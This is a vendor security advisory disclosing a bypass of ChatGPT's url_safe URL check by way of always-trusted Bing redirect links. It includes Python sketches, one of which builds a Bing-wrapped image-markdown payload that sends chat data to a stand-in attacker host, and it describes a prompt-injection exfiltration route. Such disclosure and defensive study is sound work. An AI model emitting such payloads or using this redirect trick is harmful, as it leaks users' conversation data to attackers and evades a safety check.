
OpenAI ChatGPT url_safe Mechanism Bypass

Medium

Synopsis

Tenable researchers discovered a method by which the url_safe defense mechanism can be bypassed. An attacker could exploit this bypass to cause malicious resources to be loaded for phishing or a variety of other purposes. At the time this advisory was published, the issue remained unresolved.

ChatGPT aims to protect its users by verifying URLs and checking for potentially malicious content. This mechanism is called url_safe. When a URL is referenced through image markdown or a hyperlink, ChatGPT verifies that the website is trustworthy and reliable; only then does it process the URL and act on it. This functionality protects the engine and its users from uncontrolled or unsafe URLs. However, we managed to bypass this core defense mechanism and access any website we wanted, regardless of its maliciousness.

Bypassing the url_safe defense mechanism

Rendering images is usually the best technique for exfiltrating data: an injected image URL can carry sensitive chat data in its query string, and the client leaks that data the moment it fetches the image. We noticed OpenAI tried to block the rendering of images from unsafe URLs with the url_safe defense mechanism, but we managed to bypass it.

The url_safe function runs whenever it recognizes a URL in the chat, whether through image markdown, a hyperlink, or another type of link. It simply sends the URL to ChatGPT’s backend, which returns whether or not the URL is safe.
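OpenAI has not published the url_safe implementation, so the following Python sketch is only a model of the behavior we observed: URLs extracted from the chat are sent to a backend verdict service, and only approved URLs are rendered. The function names and the TRUSTED_HOSTS allowlist are hypothetical.

```python
import re
from urllib.parse import urlparse

# Matches URLs inside markdown hyperlinks and image markdown, e.g. ![alt](url).
MARKDOWN_URL = re.compile(r"\[.*?\]\((https?://[^\s)]+)\)")

# Hypothetical reputation source; the real backend logic is not public.
TRUSTED_HOSTS = {"openai.com", "wikipedia.org", "bing.com"}

def backend_verdict(url: str) -> bool:
    """Stand-in for the backend call that decides whether a URL is safe."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)

def url_safe(message: str) -> list[str]:
    """Return only the URLs in a chat message that pass the safety check."""
    return [u for u in MARKDOWN_URL.findall(message) if backend_verdict(u)]
```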

We noticed that URLs from bing.com are always allowed, and we were able to abuse this by using our own sites indexed on Bing. Indexed sites on Bing are served through wrapped links that redirect the user from a bing.com link to the site itself, essentially an open redirect as a service.

With our bing.com links, we could bypass the url_safe defense mechanism: the check returned true, and our image markdowns rendered successfully.
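To illustrate the bypass, the sketch below (reusing the hypothetical model above) wraps an attacker-controlled URL in a Bing-style redirect link, so the only hostname a reputation check ever sees is bing.com. The /ck/a path and u= parameter merely approximate the shape of Bing's wrapped result links, and attacker.example and the exfiltrated query data are placeholders.

```python
from base64 import urlsafe_b64encode

def bing_wrapped(target: str) -> str:
    """Wrap a target URL in a Bing-style redirect link (shape approximated).

    Bing serves indexed results through redirect links hosted on bing.com,
    so a hostname-based allowlist sees only the trusted wrapper domain.
    """
    token = urlsafe_b64encode(target.encode()).decode().rstrip("=")
    return f"https://www.bing.com/ck/a?u=a1{token}"

# A prompt injection can make the model emit image markdown like this.
# The safety check approves the bing.com host, the client fetches the
# image, and the redirect delivers the request (and its query string)
# to the attacker's server.
payload = bing_wrapped("https://attacker.example/log?d=exfiltrated-data")
print(f"![ ]({payload})")
```

Fed into the url_safe sketch above, this wrapped URL passes the check even though its final destination is attacker-controlled.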

Additional Research

Tenable would like to acknowledge similar url_safe bypass research published during the disclosure window: https://embracethered.com/blog/posts/2025/spaiware-and-chatgpt-command-and-control-via-prompt-injection-zombai/

Tenable researchers became aware of this publication, and of the referenced talk delivered at Black Hat Europe 2024, after the initial report had been made to OpenAI but prior to the public disclosure of this advisory.

Solution

A solution has yet to be deployed.

Disclosure Timeline

December 10, 2024 - Tenable requests security contact via [email protected].
December 10, 2024 - OpenAI asks Tenable to share the vulnerability report via the same email thread.
December 10, 2024 - Tenable shares the full vulnerability report via the same email thread.
December 10, 2024 - OpenAI acknowledges receipt of the report and says it will follow up with updates.
December 17, 2024 - Tenable asks for an update regarding this issue.
January 3, 2025 - OpenAI adds another person to the conversation.
January 12, 2025 - Tenable asks for a status update.
January 26, 2025 - Tenable asks for a status update.
February 9, 2025 - Tenable asks for a status update.
February 23, 2025 - Tenable asks for a status update.
March 4, 2025 - Tenable asks for a status update.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected].

Risk Information

Tenable Advisory ID: TRA-2025-06
Credit:
Moshe Bernstein
Liv Matan
Yarden Curiel
Affected Products:
OpenAI ChatGPT
Risk Factor:
Medium

Advisory Timeline

March 10, 2025 - Initial release.